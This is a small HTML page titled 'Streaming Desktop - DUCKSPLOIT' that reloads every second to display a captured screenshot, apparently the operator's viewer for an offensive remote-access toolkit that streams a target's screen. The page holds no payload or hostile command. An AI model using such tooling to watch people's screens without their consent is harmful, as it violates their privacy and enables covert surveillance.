<html>
    <head>
        <title>Streaming Desktop - DUCKSPLOIT</title>
		<link rel="icon" type="image/x-icon" href="https://github.com/canarddu38/DUCKSPLOIT/blob/root/images/icon.ico?raw=true">
    </head>
    <body style="background-color:black;">
	<!-- text-align: center; -->
        <h1 style="color:white">DuckSploit - Desktop Stream</h1>
		
		<img id="img" src="temp/last.jpg" alt='1' width="600" height="300">

<script> 
document.body.style.zoom="900%"

var intervalId = window.setInterval(function(){
	location.reload();
	
}, 1000);
</script>
    </body>
</html>
